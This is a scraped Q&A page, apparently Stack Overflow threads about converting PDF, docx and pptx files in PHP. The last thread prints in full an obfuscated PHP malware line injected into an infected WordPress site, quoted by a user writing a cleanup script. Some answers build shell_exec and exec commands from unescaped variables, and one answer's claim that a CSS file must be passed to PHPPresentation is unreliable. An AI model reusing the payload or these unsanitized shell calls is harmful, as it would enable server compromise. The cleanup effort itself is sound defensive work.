PDF to HTML with PHP - php

I need to convert some pdf files into HTML. I downloaded pdftohtml for PHP but I don't know how to use it. I am trying to run it with this code:
<?php
include 'pdf-to-html-master/src/Gufy/PdfToHtml.php';
$pdf = new \Gufy\PdfToHtml;
$pdf->open('1400.pdf');
$pdf->generate();
?>
This results in a blank web page.
What do I need to modify? What is the correct code to run this script?


First option is using poppler utils
<?php
// if you are using composer, just use this
include 'vendor/autoload.php';
// if not, use this
include 'src/Gufy/PdfToHtml.php';
// initiate
$pdf = new \Gufy\PdfToHtml;
// opening file
$pdf->open('file.pdf');
// set different output directory for generated html files
$pdf->setOutputDirectory('/your/absolute/directory/path');
// do this if you want to convert in the same directory as file.pdf
$pdf->generate();
// you think your generated files is annoying? simple do this to remove the whole files
$pdf->clearOutputDirectory();
?>
Download library from here
Second option could be using pdf.js
PDFJS.getDocument('helloworld.pdf')


I'm the maintainer of the package. The package has updated. Have you already used the latest version? And, if you're using Windows, please read again the doc. Also, please do not download directly from github, use composer instead.


include 'vendor/autoload.php';
use Gufy\PdfToHtml\Pdf;
use PHPHtmlParser\Dom;
use DateTime;
public function parsepdf(Request $request)
{
$pdf = new Pdf($request->file('csv_file'));
$html = $pdf->html();
$dom = new Dom;
$total_pages = $pdf->getPages();
if ($total_pages == 1) {
$html->goToPage(1);
$dom->load($html);
$paragraphs = $dom->find('p');
$paragraphs = collect($paragraphs);
foreach($paragraphs as $p){
$datestring = preg_replace('/\xc2\xa0/', ' ', trim($p->text));
echo $datestring;
}
}
Above code for Convert pdf to html in laravel
composer require gufy/pdftohtml-php:~2
Poppler-Utils (if you are using Ubuntu Distro, just install it from
apt ) sudo apt-get install poppler-utils


I use wkhtmltopdf and it works okay. You can download it from here: http://wkhtmltopdf.org/downloads.html
I installed it in Linux and I use it like this:
$url = "https://www.google.com";
$command = "/usr/bin/wkhtmltopdf --load-error-handling ignore --disable-smart-shrinking -T 5mm -B 5mm -L 2mm -R 2mm --page-size Letter --encoding utf-8 --quiet";
$filename = '[file path].pdf';
if (file_exists($filename)) {
unlink($filename);
}
$output = shell_exec($command . " $url " . $filename);
echo $output;
Hope this helps.

Related

Error converting docx to pdf using Unoconv

I am trying to convert .docx files to .pdf files using Unoconv. Libreoffice is installed on my server and the script works for another website on the server.
Using the line use Unoconv\Unoconv; results in an HTTP ERROR 500.
Does someone know why I get a HTTP ERROR 500?
Here is my script:
<?php
require './Unoconv.php';
use Unoconv\Unoconv;
$originFilePath = './uf/invoice/17/word/202100021.docx';
$outputDirPath = './uf/invoice/17/pdf/202100021.pdf';
Unoconv::convertToPdf($originFilePath, $outputDirPath);
header("Content-type:application/pdf");
header("Content-Disposition:attachment;filename=202100021.pdf");
?>
Here is my Unoconv.php script:
<?php
namespace Unoconv;
class Unoconv {
public static function convert($originFilePath, $outputDirPath, $toFormat)
{
$command = 'unoconv --format %s --output %s %s';
$command = sprintf($command, $toFormat, $outputDirPath, $originFilePath);
system($command, $output);
return $output;
}
public static function convertToPdf($originFilePath, $outputDirPath)
{
return self::convert($originFilePath, $outputDirPath, 'pdf');
}
public static function convertToTxt($originFilePath, $outputDirPath)
{
return self::convert($originFilePath, $outputDirPath, 'txt');
}
}
?>

#Alex is correct about wrapping in try/catch first, but should the syntax be:
...
} catch(\Exception $e){
...

Start from wrapping your code with try...catch to get the error message first:
<?php
try {
require 'Unoconv.php';
use Unoconv\Unoconv;
$map1 = $_SESSION['companyid'];
$filename = $result1['filename'];
$originFilePath = './uf/doc/'.$map1.'/word/'.$filename.'.docx';
$outputDirPath = './uf/doc/'.$map1.'/pdf/'.$filename.'.pdf';
Unoconv::convertToPdf($originFilePath, $outputDirPath);
header("Content-type:application/pdf");
header("Content-Disposition:attachment;filename=".$filename.".pdf");
readfile($outputDirPath);
} catch (\Exception $e) {
die($e->getMessage());
}

I've observed that LibreOffice can be a little quirky when doing conversions, especially when running in headless mode from a webserver account.
The simplest thing to try is to modify unoconv to use the same Python binary that is shipped with LibreOffice:
#!/usr/bin/env python
should be (after checking where libreoffice is installed)
#!/opt/libreoffice7.1/program/python
Otherwise, I have worked around the problem by invoking libreoffice directly (without Unoconv):
$dir = dirname($docfile);
// Libreoffice saves here
$pdf = $dir . DIRECTORY_SEPARATOR . basename($docfile, '.docx').'.pdf';
$ret = shell_exec("export HOME={$dir} && /usr/bin/libreoffice --headless --convert-to pdf --outdir '{$dir}' '{$docfile}' 2>&1");
if (file_exists($pdf)) {
rename($pdf, $realPDFName);
} else {
return false;
}
return true;
Note the export HOME={$dir} directive, to ensure that temporary lock files will be saved in the current directory where, presumably, the web server has full permissions. If this requirement isn't met,
LibreOffice will silently fail (or at least, it will fail - that much I observed - and I haven't been able to locate an error message anywhere - I found out what was going on through the use of strace).
So your code would become:
$originFilePath = './uf/invoice/17/word/202100021.docx';
$outputDirPath = './uf/invoice/17/pdf/202100021.pdf';
$dir = dirname($originFilePath);
$pdf = $dir . DIRECTORY_SEPARATOR . basename($originFilePath, '.docx').'.pdf';
$ret = shell_exec("export HOME={$dir} && /usr/bin/libreoffice --headless --convert-to pdf --outdir '{$dir}' '{$originFilePath}' 2>&1");
// $ret will contain any errors
if (!file_exists($pdf)) {
die("Conversion error: " . htmlentities($ret));
}
rename($pdf, $outputDirPath);
header("Content-type:application/pdf");
header("Content-Disposition:attachment;filename=202100021.pdf");
readfile($outputDirPath);
I assume that libreoffice is present in the usual alternatives link of "/usr/bin/libreoffice", otherwise you need to retrieve its path with the terminal command of "which libreoffice". Or, from a php script,
<?php
header('Content-Type: text/plain');
print "If this works:\n";
system('which libreoffice 2>&1');
print "\n-- otherwise a different attempt, returning too much information --\n";
system('locate libreoffice');

Style & content is missing in when create pptx from existing pptx using PHPPresentation

I am using this below code to load a pptx file & saving into a new pptx. My code is simple. But style is broken in new pptx file. can anyone kindly help ?
<?php
require_once 'vendor/autoload.php';
use PhpOffice\PhpPresentation\PhpPresentation;
use PhpOffice\PhpPresentation\IOFactory;
use PhpOffice\PhpPresentation\Style\Color;
use PhpOffice\PhpPresentation\Style\Alignment;
function createPPT($template){
$pptLayout = new \PhpOffice\PhpPresentation\DocumentLayout();
$pptLayout->setDocumentLayout($pptLayout::LAYOUT_SCREEN_16X10);
$pptTMPL = \PhpOffice\PhpPresentation\IOFactory::createReader('PowerPoint2007');
//$ppt = $pptTMPL->load("./ppt-template.pptx");
$ppt = $pptTMPL->load("./$template");
$ppt->setLayout($pptLayout);
$oWriterPPTX = IOFactory::createWriter($ppt, 'PowerPoint2007');
$oWriterPPTX->save(__DIR__ . "/sample2.pptx");
}
createPPT("a.pptx", "PowerPoint2007");

Whenever we are working working with MS Office, import / export from php, we need to include a CSS file in the related code. More then 10 time we also faced this kind of problem. So we need to send the style file URL, to the related / called file.
Check the modified code below :-
function createPPT($template)
{
$custom_css = "<your_url>/stye.css";
$pptLayout = new \PhpOffice\PhpPresentation\DocumentLayout();
$pptLayout->setDocumentLayout($pptLayout::LAYOUT_SCREEN_16X10);
$pptTMPL = \PhpOffice\PhpPresentation\IOFactory::createReader('PowerPoint2007');
//$ppt = $pptTMPL->load("./ppt-template.pptx");
$ppt = $pptTMPL->load("./$template" , $custom_css);
$ppt->setLayout($pptLayout);
$oWriterPPTX = IOFactory::createWriter($ppt, 'PowerPoint2007');
$oWriterPPTX->save(__DIR__ . "/sample2.pptx");
}
Try this.
I hope this will support your project.

exec pdfimages in PHP

I have full root access through VPS (CentOS).
In Unix shell I am able to extract images with following command:
pdfimages -j xyz.pdf images
But I am unable to execute the command through PHP
exec ("pdfimages -j xyz.pdf images");
xpdf is installed. Also I have checked that // Exec function exists; // Exec is not disabled; // Safe Mode is not on.. by using following code:
$exec_enabled =
function_exists('exec') &&
!in_array('exec', array_map('trim', explode(', ', ini_get('disable_functions')))) &&
strtolower(ini_get('safe_mode')) != 1;
if($exec_enabled) { echo "enabled"; }
The following is however getting executed properly:
exec("ls -1 *.php", $output);
foreach ($output as &$tmp){
echo "$tmp<br>";
}
What am I doing wrong? Where is the issue?

You need to specify the path like below , this will save each image in the folder of your PDF.
'image' is just the file name ..
$path = 'path/to/your/folder/';
$pdf = $path.'xyz.pdf';
$command = 'pdfimages -j '.$pdf.' '.$path.'image';
exec($command);

Removing a string in a PHP file with Start and End

I'm trying to clean a WordPress which has been infected by an exploit.
All php files were added a line like this at the beginning of it :
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} #error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, $gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>
The content of this line is random for each files, but they all start with <?php if(!isset($GLOBALS[ and ends with -1; ?>.
I'm trying to create a PHP file removing this line to all my files.
Here's what I've done now :
<?php
$dir_iterator = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($dir_iterator);
$infected = 0;
$clean = 0;
foreach ($iterator as $file) {
if($file->getExtension() == 'php'){
$f = fopen($file->getPathname(), 'r+');
$start = '<?php if(!isset($GLOBALS[';
$end = '-1; ?>';
if(fgets($f, 26) == '<?php if(!isset($GLOBALS[')
{
echo '<p style="color: red;"> The file '. $file->getPathname() . ' is infected ! </p>';
// Don't know what to do here
$infected++;
}
else
{
echo '<p style="color: green;"> The file '. $file->getPathname() . ' is clean ! </p>';
$clean++;
}
}
}
echo $infected.' files infected <br />';
echo $clean. ' files clean.';
?>
But I'm not very eased with file editing in PHP, so I would like to remove the line starting with my $start and ending with my $end .
